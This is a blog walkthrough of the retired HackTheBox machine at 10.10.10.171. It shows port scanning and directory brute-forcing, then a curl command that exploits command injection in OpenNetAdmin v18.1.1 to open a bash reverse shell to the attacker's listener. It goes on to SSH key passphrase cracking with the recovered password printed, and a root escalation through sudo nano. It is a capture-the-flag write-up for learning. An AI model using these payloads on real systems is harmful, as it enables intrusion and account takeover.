Overview

Hello Awesome Hackers, nice to meet you all this blog will focus on a retired box on HackTheBox.

Machine - IP: 10.10.10.171

Recon

NSE: Loaded 125 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 21:31
Completed NSE at 21:31, 0.00s elapsed
Initiating NSE at 21:31
Completed NSE at 21:31, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 21:31
Completed Parallel DNS resolution of 1 host. at 21:31, 0.00s elapsed
Initiating Connect Scan at 21:31
Scanning 10.10.10.171 [1000 ports]
Discovered open port 22/tcp on 10.10.10.171
Discovered open port 80/tcp on 10.10.10.171
Increasing send delay for 10.10.10.171 from 0 to 5 due to max_successful_tryno increase to 4
Stats: 0:00:35 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 69.70% done; ETC: 21:32 (0:00:15 remaining)
Completed Connect Scan at 21:32, 52.39s elapsed (1000 total ports)
NSE: Script scanning 10.10.10.171.
Initiating NSE at 21:32
Completed NSE at 21:32, 15.85s elapsed
Initiating NSE at 21:32
Completed NSE at 21:32, 0.00s elapsed
Nmap scan report for 10.10.10.171
Host is up (0.63s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
| ssh-hostkey: 
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open  http
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-title: Apache2 Ubuntu Default Page: It works

NSE: Script Post-scanning.
Initiating NSE at 21:32
Completed NSE at 21:32, 0.00s elapsed
Initiating NSE at 21:32
Completed NSE at 21:32, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 68.46 seconds```

Open Ports

—> port 22 - ssh
—> Port 80 - HTTP

Now I open this IP address on the browser, it is showing Apache2 default page.

Directory Brute Force

gobuster dir -u http://10.10.10.171 -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -x php,txt,html -o gobuster-root-php_txt_html

/music (Status: 301)
/artwork (Status: 301)
/sierra (Status: 301)```

Coming to the login page, we got the “open net admin” version let’s recon about the “ona".

http://10.10.10.171/ona

Now I see that Version v18.1.1 which it is warning is not the latest.

Now, I trying to find the exploit by using searchsploit

Run the netcat command

nc -nvlp 443

Now I trying to get the shell by using this Curl command

curl -s -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;bash -c 'bash -i >%26 /dev/tcp/10.10.16.7/443 0>%261'&xajaxargs[]=ping" http://10.10.10.171/ona/

I get the shell

Privilege Escalation

Now my task is to go from www-data to jimmy. Now I started the Enumeration and check everything like config files, PHP files, etc.  I get some juicy data.

So here we got some credentials for the database.

Now let’s check how many users are present in the home directory of this machine. Here we got there are two users present in the machine and that is "Jimmy" and "Joanna"

Let’s try to connect through the ssh port for the user jimmy with the above password which we found in the database_settings.inc.php file. I successfully logged in.

Now I found the interesting directory inside the /var/www/ is /internal

The PHP must be hosted using a web server and a particular port MUST be used.

Now I copied the private key back to my box. I used ssh2john  converts the key into a format that john the ripper can understand and crack the passphrase.

sh2john.py id_rsa > hash
john –wordlist=/usr/share/wordlists/rockyou.txt hash

Once the password is cracked. here is the password

joanna:bloodninjas

now I was given permission to id_rsa

chmod 600 id_rsa

now I trying to log in using ssh port

ssh -i id_rsa jonna@10.10.10.171

and enter the passphrase and hit enter. We are successfully logged in. Now we using this command

sudo -l

gtfobins

When inside nano press Ctrl+r followed by Ctl+x. Nano will prompt you which command you want to execute. The command essentially opens a shell on the box as a root.

we get the shell. here are the flags

user.txt 
32charactershashedflag
root.txt
32charactershashedflag

Thank you for Reading

HAPPY HACKING!!!

Twitter: https://twitter.com/nagasaikiran010

Linkedin: https://www.linkedin.com/in/nagasaikiran010/